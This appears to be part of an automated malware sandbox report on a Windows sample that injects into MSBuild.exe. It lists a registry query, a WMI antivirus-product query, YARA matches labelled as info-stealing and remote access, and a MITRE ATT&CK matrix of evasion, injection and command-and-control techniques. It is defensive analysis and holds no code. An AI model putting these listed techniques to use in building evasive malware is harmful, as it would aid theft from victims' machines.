            Source: C:\Users\user\Desktop\v4mNsTzbsL.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: MSBuild.exe, 00000001.00000002.3815168819.0000000000C3C000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

            Stealing of Sensitive Information

            Source: Yara match; File source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 0.2.v4mNsTzbsL.exe.2ceef48.0.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 0.2.v4mNsTzbsL.exe.2cff474.1.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 0.2.v4mNsTzbsL.exe.2ceef48.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 0.2.v4mNsTzbsL.exe.2ceaad0.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 0.2.v4mNsTzbsL.exe.2cff474.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 00000001.00000002.3814656283.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000000.00000002.1364616725.0000000002CFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000000.00000002.1364616725.0000000002CEA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000001.00000002.3815568317.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: Process Memory Space: v4mNsTzbsL.exe PID: 8872, type: MEMORYSTR
            Source: Yara match; File source: Process Memory Space: MSBuild.exe PID: 8920, type: MEMORYSTR

            Remote Access Functionality

            Source: Yara match; File source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 0.2.v4mNsTzbsL.exe.2ceef48.0.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 0.2.v4mNsTzbsL.exe.2cff474.1.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 0.2.v4mNsTzbsL.exe.2ceef48.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 0.2.v4mNsTzbsL.exe.2ceaad0.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 0.2.v4mNsTzbsL.exe.2cff474.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 00000001.00000002.3814656283.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000000.00000002.1364616725.0000000002CFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000000.00000002.1364616725.0000000002CEA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000001.00000002.3815568317.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: Process Memory Space: v4mNsTzbsL.exe PID: 8872, type: MEMORYSTR
            Source: Yara match; File source: Process Memory Space: MSBuild.exe PID: 8920, type: MEMORYSTR

            MITRE ATT&CK Matrix

            Techniques the report marks for this sample, listed per tactic with the figure shown in the matrix cell; tactics with no marked technique are listed as none.

            Reconnaissance: none
            Resource Development: none
            Initial Access: none
            Execution: Windows Management Instrumentation (11), Native API (1)
            Persistence: DLL Side-Loading (1)
            Privilege Escalation: Process Injection (311), DLL Side-Loading (1)
            Defense Evasion: Masquerading (1), Disable or Modify Tools (1), Virtualization/Sandbox Evasion (131), Process Injection (311), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (1), Software Packing (2), Timestomp (1), DLL Side-Loading (1)
            Credential Access: none
            Discovery: Security Software Discovery (121), Virtualization/Sandbox Evasion (131), Application Window Discovery (1), System Information Discovery (13)
            Lateral Movement: none
            Collection: Archive Collected Data (11)
            Command and Control: Encrypted Channel (12), Non-Standard Port (1), Ingress Tool Transfer (11), Non-Application Layer Protocol (1), Application Layer Protocol (112)
            Exfiltration: none
            Impact: none